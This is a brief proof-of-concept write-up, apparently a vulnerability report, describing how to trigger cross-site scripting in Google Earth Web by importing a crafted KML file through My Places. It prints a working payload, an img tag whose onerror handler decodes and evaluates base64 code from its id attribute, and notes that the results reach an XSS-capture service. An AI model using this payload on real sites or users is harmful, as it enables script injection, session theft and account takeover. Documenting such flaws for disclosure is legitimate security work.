1) Go to http://earth.google.com/web
2) Go to My Places
3) Click on Import KMZ file
4) Select our file that contains the attack vector i.e: xss.kml, and upload it.
4.1) Payload:
"><img src=x id=payload-base64 onerror=eval(atob(this.id))>
5) Click on Save
6) Preview
7) The XSS is reflected in the third-party application used for this XSS, in my case, i used XSSHUNTER.